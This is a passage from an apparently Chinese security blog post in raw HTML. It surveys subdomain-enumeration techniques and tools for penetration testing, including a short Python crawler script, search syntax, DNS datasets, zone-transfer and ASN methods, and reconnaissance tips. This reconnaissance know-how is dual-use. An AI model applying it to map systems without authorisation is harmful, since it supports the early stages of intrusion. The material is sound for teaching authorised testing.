src="https://wechat2rss.xlab.app/img-proxy/?k=fd3a3ead&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppylZCicg3w9SejIVWYpsZ5MRzciaobXcWDDZkYLY8PBY1gsF1E8gGVFBA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><p><span style="font-size: 15px;color: rgb(73, 68, 68);">售卖子域名数据库的站点</span><br/></p><p><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://domains-index.com/" target="_blank">https://domains-index.com/</a></span><img class="" data-copyright="0" data-ratio="0.48508098891730606" data-s="300,640" style="" data-type="png" data-w="1173" src="https://wechat2rss.xlab.app/img-proxy/?k=d4cbcdd5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xpp8spuHNHWapKVNcsm9jhtqIeUNzIE4NzdicUP15amf2xvo0kmW1tZ6CQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><p><span style="font-size: 15px;color: rgb(73, 68, 68);">这是对于上面站点的展示站点。只展示304个结果里面的前50个。搜我校只得到1个结果，或许对于国外的站点效果会好些吧。</span><img class="" data-copyright="0" data-ratio="0.47576736672051695" data-s="300,640" style="" data-type="png" data-w="1238" src="https://wechat2rss.xlab.app/img-proxy/?k=1c942bbe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xpppTjALiaVfHTFdcVNaL2cnfw1DeMwxFPOicB0yriajQDK4n9kaEBzShoaQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 18px;">0x05 搜索引擎</span></strong></span></p><p style="margin: 0px 0px 1.2em !important;"><em><span style="font-size: 15px;color: rgb(73, 68, 68);">下面是搜索引擎以及依赖搜索引擎的工具。</span></em></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">语法搜索，百度、bing和google、Yahoo的：site:baidu.com、site:xx.com -www -mail 等等</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">不过百度的百度以前记得有句不是很常见的语法，也很简单，貌似是“：v”还是怎样的，试了很久并没有试出来，实在是想不起来了。</span><img class="" data-copyright="0" data-ratio="0.8117154811715481" data-s="300,640" style="" data-type="png" data-w="717" src="https://wechat2rss.xlab.app/img-proxy/?k=5bc779a0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xpp27O9RzVn8F5twvXZMuFr9XyXnIYDibA7Q78wEQSYmouZSibc34AuxJAg%2F640%3Fwx_fmt%3Dpng"/><img class="" data-copyright="0" data-ratio="0.7874015748031497" data-s="300,640" style="" data-type="png" data-w="762" src="https://wechat2rss.xlab.app/img-proxy/?k=46586314&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppHNn5BVRiaUYIseCDialiaqJYCpLIJuADh4tP8wRJevPZZcm7DOT7BKgQw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">只好推荐一款python3写的工具，根据百度爬行子域名，并且根据http响应状态码来判断是否可访问。<br/>爬行百度可以获得96个测试域名的子域名，个人感觉针对于国内域名来说其结果还是比较有参考价值的。</span></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">Digger</span></code></pre><p><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/admintony/Digger" target="_blank">https://github.com/admintony/Digger</a></span><img class="" data-copyright="0" data-ratio="0.8800489596083231" data-s="300,640" style="" data-type="png" data-w="817" src="https://wechat2rss.xlab.app/img-proxy/?k=1af3d8bf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppg39SaChUCddlQWIMAjazMwKmgWdJwhArVtJQLs5R51wSefpEnPhgKw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 18px;">0x06 专业安全服务商互联网扫描项目</span></strong></span></p><p style="margin: 0px 0px 1.2em !important;"><em><span style="font-size: 15px;color: rgb(73, 68, 68);">一些大型的专业安全服务商会把互联网的扫描项目所得到的数据共享出来，比如Rapid7的Sonar项目。（还有很多有意思的项目</span></em><em><span style="font-size: 15px;color: rgb(73, 68, 68);"><a href="https://scans.io/）" target="_blank">https://scans.io/）</a></span></em></p><p><span style="font-size: 15px;color: rgb(73, 68, 68);">经过测试，22.8GB的数据解压出来大概230G大小。在winserver上对大文本检索工具的测试在pilotedit、EmEditor和glogg身上兜兜转转，绕了一圈最后用的winhex（winhex牛批！），发现测试域名的结果只有6个。但是对于大厂商域名的测试得到的结果还是比较理想的。可见这种方法最终的结果与目标规模的差异也会有巨大的差异。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://scans.io/study/sonar.fdns_v2" target="_blank">https://scans.io/study/sonar.fdns_v2</a></span><img class="" data-copyright="0" data-ratio="0.5338235294117647" data-s="300,640" style="" data-type="png" data-w="1360" src="https://wechat2rss.xlab.app/img-proxy/?k=f5473d23&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppHPbjUP6Xh9tdoRGvv1GVvwJgf7Grbo95xlgyghtSbVUxibU6I9XlibSA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><p><span style="font-size: 15px;color: rgb(73, 68, 68);">第三方安全服务商一般是指virustotal、netcraft等一些主要研究领域为其他安全领域但是顺带可以提供子域名信息的厂商或者网站。常常作为api被引用在上面介绍的第二种工具当中。有个hacktarget的网站（</span><span style="color: rgb(0, 122, 170);"><a href="https://dnsdumpster.com/" target="_blank">https://dnsdumpster.com/</a></span>）<span style="font-size: 15px;">比较有意思，它会把搜索结果的dns关系以一张大导图的形式出来。</span></p><p><span style="font-size: 15px;color: rgb(73, 68, 68);"></span></p><p><img class="" data-copyright="0" data-ratio="0.7230215827338129" data-s="300,640" style="" data-type="png" data-w="834" src="https://wechat2rss.xlab.app/img-proxy/?k=af767332&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppialMOElTas3R3TlTdvl9qiaf1sbEvff4EsBwYDvWbjmlhv0ykE8Fh0uA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 18px;">0x07 第三方安全服务商相关的数据</span></strong></span></p><p style="margin: 0px 0px 1.2em !important;"><em><span style="font-size: 15px;color: rgb(73, 68, 68);">下面介绍一种稍稍另辟蹊径的方法，直接从主域名域名开始爬起，爬到再也找不到不同的域名为止。个人觉得好处在于某些网站（如学校）可能会有些内网的系统在外网上是无法访问或者收录不到的，可以借助这种方法来发现。</span></em></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">下面的工具是t00ls的BMa_china师傅写的，但是原版略有问题，在爬行“xxx.edu.cn”这种的时候会爬所有的“edu.cn”下的域名，所以稍微修改了一下下。</span></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">#!/usr/bin/python
#coding:utf-8
#author:BMa_china from t00ls

import  requests
import argparse
import  urlparse
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def getSubDomain(url):

    try:
        response = requests.get(url, timeout=5,verify=False)  # 作为一个递归查询
        urlsplit = url.split(&#34;.&#34;)
        url = url if len(urlsplit) == 2 else urlsplit[-2] + &#34;.&#34; + urlsplit[-1]
        patten = &#39;https?:\/\/[^&#34;/]+?\.{url}&#39;.format(
            url=urlsplit[-3] + &#34;.&#34; + urlsplit[-2]+ &#34;.&#34; + urlsplit[-1]
        )
        # patten = &#39;https?:\/\/[^/]+?\.{url}&#39;.format(
        #     url=urlsplit[-2] + &#34;\.&#34; + urlsplit[-1]
        # )
        # print patten
        m = re.findall(patten, response.content)
        # print m

        for url in m:
            if url not in domainList:
                print url
                domainList.append(url)
                getSubDomain(url)
    except Exception,e:
        # print str(e)
        print &#34;Wrong:-----&#34; + &#34; &#34; + url

if __name__ == &#34;__main__&#34;:

    attentionPlz = &#34;&#34;&#34;
        请输入域名，如：http(s)://www.qq.com
    &#34;&#34;&#34;
    print attentionPlz
    domainList = []  # 子域名列表
    urlList = []  # 页面抓取的url列表

    parse = argparse.ArgumentParser()
    parse.add_argument(&#34;-u&#34;,dest=&#34;url&#34;,help=&#34;url&#34;,required=True)
    args = parse.parse_args()
    url = args.url
    # url = &#34;<a href="http://www.qq.com" target="_blank">http://www.qq.com</a>&#34;
    getSubDomain(url)
    print domainList
    print len(domainList)</span></code></pre><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"><br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 18px;color: rgb(0, 0, 0);"><strong>0x09 根据已有数据重组拼接碰撞</strong></span></p><p style="margin: 0px 0px 1.2em !important;"><em><span style="font-size: 15px;color: rgb(73, 68, 68);">另外还有根据已经存在的结果重组拼接来碰撞其他域名的工具。</span></em></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">altdns</span></code></pre><p><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/infosec-au/altdns" target="_blank">https://github.com/infosec-au/altdns</a></span><img class="" data-copyright="0" data-ratio="0.1873767258382643" data-s="300,640" style="" data-type="png" data-w="1014" src="https://wechat2rss.xlab.app/img-proxy/?k=75b3b077&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppb5MJIHVE9m2EJhxmYw8XMJjE9ibzJ1sh9mW6J6TeiaGmyhdhgfSkibBjg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 18px;"><strong><span style="color: rgb(0, 0, 0);">0x10 其他文章中发现的不太常见的方式</span></strong></span></p><p style="margin: 0px 0px 1.2em !important;"><em><span style="font-size: 15px;color: rgb(73, 68, 68);">下面是在其他文章当中发现的个人认为比较罕见的一种手法——互联网自治系统号码子域名枚举。</span></em></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">模仿文章当中的步骤发现对于文中描述的获得域名asn的操作并没有成功复现，因为站点并没有获得到我校站点的ip信息。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span></p><p><img class="" data-copyright="0" data-ratio="0.6361355081555834" data-s="300,640" style="" data-type="png" data-w="797" src="https://wechat2rss.xlab.app/img-proxy/?k=18de4ddb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppGCRocU4gQiagTZDhWfU35RrnodcTYoVJz5rZia8Nn2eyPXdl2qk3cHTQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(73, 68, 68);">但是可以得到百度的asn信息，可见该方法用于大厂商的域名检测可能是有一定效果的。</span><img class="" data-copyright="0" data-ratio="0.39503619441571874" data-s="300,640" style="" data-type="png" data-w="967" src="https://wechat2rss.xlab.app/img-proxy/?k=2a79e22d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xpp3rK8AEiat59F8MGByOcD639bpzYibyHOk9hxwpuF5EtV3XkjaTqqFvLw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">使用该方法技术的一款维护时间长达6年的工具<br/>该工具会通过检查DNSKEY记录并检查区域是否配置为NSEC或NSEC3。</span></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">dnsrecon</span></code></pre><p><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/darkoperator/dnsrecon" target="_blank">https://github.com/darkoperator/dnsrecon</a></span><img class="" data-copyright="0" data-ratio="0.6340057636887608" data-s="300,640" style="" data-type="png" data-w="1041" src="https://wechat2rss.xlab.app/img-proxy/?k=2c17b4df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppKDXh0IPoer86ibaWt0nzSpCiaWAunjJMEn9o3tdrPib1jBAZfAkV8jCrg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 18px;color: rgb(0, 0, 0);"><strong>0x11 其他比较好用的方式</strong></span></p><p style="margin: 0px 0px 1.2em !important;"><em><span style="font-size: 15px;color: rgb(73, 68, 68);">然后再介绍几种我觉得<em><span style="font-size: 15px;color: rgb(73, 68, 68);">比较好用</span></em>但是不好分类的子域名发掘方式。</span></em></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">1. 云悉 
</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">自动获得title，支持导出。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="http://www.yunsee.cn" target="_blank">http://www.yunsee.cn</a></span><img class="" data-copyright="0" data-ratio="0.5083114610673666" data-s="300,640" style="" data-type="png" data-w="1143" src="https://wechat2rss.xlab.app/img-proxy/?k=c9b710be&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppChSgFJxm1h7xuhW29ZnUibmt8KG4AAzptEgbqu5WkS54NadIL0Gylibg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">2. 站长帮手</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">测试域名可以得到140个结果<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="http://i.links.cn/subdomain/" target="_blank">http://i.links.cn/subdomain/</a></span><img class="" data-copyright="0" data-ratio="0.5173439048562933" data-s="300,640" style="" data-type="png" data-w="1009" src="https://wechat2rss.xlab.app/img-proxy/?k=5980dc66&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xpp1fu1qTmWviaXtzRbcYsbHO6CjhpqNcrEM1ys3KNy67j0fhhpml1lFyA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">3. 备案号</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">对大厂商比较好用<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="http://www.beianbeian.com/search-1/%E4%BA%ACICP%E8%AF%81030173%E5%8F%B7" target="_blank">http://www.beianbeian.com/search-1/%E4%BA%ACICP%E8%AF%81030173%E5%8F%B7</a></span><img class="" data-copyright="0" data-ratio="0.45905707196029777" data-s="300,640" style="" data-type="png" data-w="1209" src="https://wechat2rss.xlab.app/img-proxy/?k=d715ea7f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppmkI8XFNXl2lLqZDURnibXwEC1KibrLuw1vyYkcK3soRN5h2AGGJRKMXQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">4. crossdomain.xml文件</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">利用crossdomain.xml的跨域策略设置特性<br/>比如：<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://www.baidu.com/crossdomain.xml" target="_blank">https://www.baidu.com/crossdomain.xml</a></span><img class="" data-copyright="0" data-ratio="0.3751783166904422" data-s="300,640" style="" data-type="png" data-w="701" src="https://wechat2rss.xlab.app/img-proxy/?k=97ea0056&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppC0XR9zpibAs5x4NibA1z8Kr43VuBguF6ox7CmwkrH0UDJQ5k5OXzAcUg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><pre style="font-family: Consolas,Inconsolata,Courier,monospace;font-size: 1em;line-height: 1.2em;margin: 1.2em 0px;"><code style="font-size: 0.85em;font-family: Consolas,Inconsolata,Courier,monospace;margin: 0px 0.15em;background-color: rgb(248, 248, 248);white-space: pre;overflow: auto;border-radius: 3px;border-width: 1px;border-style: solid;border-color: rgb(204, 204, 204);-moz-border-top-colors: none;-moz-border-right-colors: none;-moz-border-bottom-colors: none;-moz-border-left-colors: none;padding: 0.5em 0.7em;display: block !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">5. 域传送漏洞</span></code></pre><p><span style="font-size: 15px;color: rgb(73, 68, 68);">wooyun上出过好几个案例，李姐姐文章也介绍的很详细，不再赘述。效果虽好，不过可遇不可求。</span><img class="" data-copyright="0" data-ratio="0.6149312377210217" data-s="300,640" style="" data-type="png" data-w="509" src="https://wechat2rss.xlab.app/img-proxy/?k=1acf28ab&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xpphtXCsEB0jtNxHqaBq9edSzGkmaotWtK7ZeRhrefpZmJQu1OJDKKSBQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><p style="margin: 0px 0px 1.2em !important;"><strong><span style="color: rgb(0, 0, 0);font-size: 18px;">0x14 额外的一些骚tips</span></strong></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">最后是一些个人觉得比较骚的tips和几个额外的点，大多数来源于t00ls论坛帖子下面的讨论区。</span></p><ol style="margin-left: 0px;margin-right: 0px;" class=" list-paddingleft-2"><li><p><span style="font-size: 15px;color: rgb(73, 68, 68);">分析已经得到域名的ip特征，根据C段寻找</span></p></li><li><p><span style="font-size: 15px;color: rgb(73, 68, 68);">Src漏洞挖掘当中关注厂商新产品，有时活动着急上线有趁虚而入之机</span></p></li><li><p><span style="font-size: 15px;color: rgb(73, 68, 68);">从APP下手，数据和流量包层面下手，进而C段探索</span></p></li><li><p><span style="font-size: 15px;color: rgb(73, 68, 68);">对ios系统的app来说，appstore最下面都有一行  “开发人员开发的其他app”</span></p></li><li><p style="margin: 0.5em 0px !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">domain_hunter-Burp插件形式的子域名搜集工具。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/bit4woo/domain_hunter" target="_blank">https://github.com/bit4woo/domain_hunter</a></span></p><p style="margin: 0.5em 0px !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span></p><p><img class="" data-copyright="0" data-ratio="0.5678233438485805" data-s="300,640" style="" data-type="png" data-w="951" src="https://wechat2rss.xlab.app/img-proxy/?k=a75b5b20&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppW1V8NiauQB3f6ibRGFJibPHAuvDvQiboorM1TiaqTxhJ88bYDQibVfiaKOWjQ%2F640%3Fwx_fmt%3Dpng"/></p></li><li><p><span style="font-size: 15px;color: rgb(73, 68, 68);">DNSdigger-用来寻找DNS服务器<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="http://www.dnsdigger.com" target="_blank">http://www.dnsdigger.com</a></span><img class="" data-copyright="0" data-ratio="0.5703048180924287" data-s="300,640" style="" data-type="png" data-w="1017" src="https://wechat2rss.xlab.app/img-proxy/?k=5ec63630&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xpp7YVoZhBiagT2iaqFfwa2gWDcS2eyJqYQYcpGBibttulfpLb09hiazCPzBQ%2F640%3Fwx_fmt%3Dpng"/></p></li><li><p style="margin: 0.5em 0px !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">DiscoverSubdomain<br/>在git上搜索的过程中还发现了一款“要你命三千”（这里无任何贬义），作者把18款扫描器绑在一块了。偶尔会出现报错等小瑕疵，因为这工具有点慢，墙内网络环境对测试域名能得到100左右的结果（难道不应该得到暴多的么）。<br/></span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/coco413/DiscoverSubdomain" target="_blank">https://github.com/coco413/DiscoverSubdomain</a></span></p><p><img class="" data-copyright="0" data-ratio="0.9096267190569745" data-s="300,640" style="" data-type="png" data-w="509" src="https://wechat2rss.xlab.app/img-proxy/?k=00b41b21&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppPLVvtyBY5czXR8uibmNK1VY3StsNlNIbkFDylGXp95Xv436DcSKIPgw%2F640%3Fwx_fmt%3Dpng"/></p><p><img class="" data-copyright="0" data-ratio="1.1291759465478841" data-s="300,640" style="" data-type="png" data-w="449" src="https://wechat2rss.xlab.app/img-proxy/?k=c1762e20&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xppI9eev2XLAibFD9EaHGBibBKnM5rKb9UbM4YmJTGoKEmXf3T9zfnRp59w%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p><br/></p></li></ol><p><br/></p><p><br/></p><p style="margin: 0px 0px 1.2em !important;"><em><span style="font-size: 15px;color: rgb(73, 68, 68);">正常来说大多数的网络环境跑这些工具都没啥问题，但是有一点，寒假在家测试时发现如果使用中国某动宽带默认的网络环境，可能是因为DNS的问题，如果域名不存在它会自动的跳到一个自家的导航域名。这就导致结果的极大的不准确和全家断网这种情况的多发，可以说是很坑了。</span></em></p><p style="margin: 0px 0px 1.2em !important;"><strong><span style="font-size: 15px;color: rgb(73, 68, 68);">本来只是想单纯的写个工具分享帖，重度拖延症战线拉的太长，文章有点四不像了，只希望能帮到需要的人。</span></strong></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"><br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span></p><hr/><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span><br/></p><blockquote><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 16px;"><strong><span style="color: rgb(73, 68, 68);">参考链接</span></strong></span><span style="font-size: 15px;color: rgb(73, 68, 68);">：</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);">参考最多的一篇文章</span><span style="font-size: 15px;color: rgb(73, 68, 68);">：</span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6" target="_blank">https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6</a></span><br/><span style="font-size: 15px;color: rgb(0, 0, 0);">该文章当中所提到点列的清单</span><span style="font-size: 15px;color: 